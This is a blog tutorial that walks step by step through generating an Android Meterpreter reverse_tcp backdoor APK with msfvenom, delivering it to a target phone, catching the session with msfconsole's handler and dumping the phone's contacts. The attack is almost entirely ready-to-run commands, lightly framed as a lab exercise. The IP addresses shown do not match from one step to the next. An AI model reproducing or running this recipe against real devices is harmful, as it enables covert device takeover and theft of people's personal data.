Using Metasploit for Backdoor Penetration Testing | sansjtw’s blog

LOADING

Loading is too slow. Please turn on the cache browser. By default, it is turned on.

Using Metasploit for Backdoor Penetration Testing

2024/5/25 Kali Linux Android Original

Table of Contents

Introduction

The two main protagonists of this article:

  • Metasploit:
    Metasploit is an open-source tool widely used for penetration testing and exploit development. It provides a rich set of exploit and penetration testing tools. Moreover, the Metasploit framework is an open-source tool designed to facilitate penetration testing and has excellent extensibility.

  • Msfvenom:
    Msfvenom is a powerful backdoor generation tool within the Metasploit framework. It can generate malicious software programs such as trojans, backdoors, etc., targeting different operating systems and applications.

Getting Started

Exercise Objective: Use Msfvenom to generate a payload trojan and control the target machine.

Attacker Machine: Kali Linux (kali-rolling_arm64)

Target Machine: Android 10

1

Installing Metasploit

Installation instructions can be found here.

Here, I’ll use a one-liner command for installation:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Installation may take some time, so please be patient.

After installation, check the command parameters:

msfvenom -h

6
Explanation of parameters:


-l, --list <type>: Lists all available resources of a specified module type. Module types include: payloads, encoders, nops,... all
-p, --payload <payload>: Specifies the payload to use. Custom payloads are also supported for almost all platforms.
-f, --format <format>: Specifies the output format.
-e, --encoder <encoder>: Specifies the encoder to use. If neither -e nor -b is used, the raw payload is output.
-a, --arch <architecture>: Specifies the target architecture of the payload, e.g., x86, x64, or x86_64.
--platform <platform>: Specifies the target platform of the payload.
-o, --out <path>: Specifies the location to save the created payload.
-b, --bad-chars <list>: Sets the bad characters to avoid, specifying the characters to be filtered out to prevent the payload from being unusable after encryption. For example: do not use '\x0f', '\x00'.
-n, --nopsled <length>: Specifies a NOP sled length for the payload.
-s, --space <length>: Sets the maximum length of the effective payload, i.e., the file size.
-i, --iterations <count>: Specifies the number of times to encode the payload.
-c, --add-code <path>: Specifies an additional win32 shellcode file.
-x, --template <path>: Specifies a custom executable file as a template and embeds the payload into it.
-k, --keep: Protects the template program, running the injected payload as a new process.
-v, --var-name <value>: Specifies a custom variable to determine the output format.
-t, --timeout <second>: Specifies the number of seconds to wait for a valid payload from stdin (default is 30, 0 disables).
-h,--help: Displays help options.

Generating the Payload

Since we’re testing in a local network, I’ll use the local LAN IP. To check the IP:

ipconfig

The IP for Kali is 192.168.0.100.

After confirming the IP, let’s generate the backdoor trojan:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=1234 R > app.apk

Where:
-p: payload (attack payload). Since the target is an Android device, I’m using android/meterpreter/reverse_tcp. For other systems, you can refer to this link for more payload options.
LHOST: Attacker’s IP.
LPORT: Attacker’s port, set as desired.
The final app.apk is the name of the APK package.
2
Once the generation is successful, use various methods to transfer the backdoor software to the target device. After the target downloads and installs the app, we can use msfconsole to listen for the target.

Configuring msfconsole

Start msfconsole:

msfconsole

3

Once it starts, an input prompt will appear.
First, use the handler listening module:

use exploit/multi/handler

4

Then, set up the handler:

set payload android/meterpreter/reverse_tcp

Set the IP (attacker’s):

set lhost 192.168.0.100

Set the port (attacker’s):

set lport 1234

After setting up, use the command to view parameters:

options

5
The parameter information corresponds to the settings made earlier. Once everything is set up, we’re ready to start listening for the target.

Listening with msfconsole

Enter the command to run the handler module (ensure the target is running the app):

run

Wait for meterpreter > to appear, indicating successful execution. Then, enter

help

to view all executable commands, including the ability to execute shell commands.

Note!
The backdoor software must remain running for successful listening. However, it may be terminated by the system!

Here, try using the command

dump_contacts // retrieve phone contacts

7
The contacts will be saved to a txt file. Exit and use the cat command to view the file

cat contacts_dump_202405021914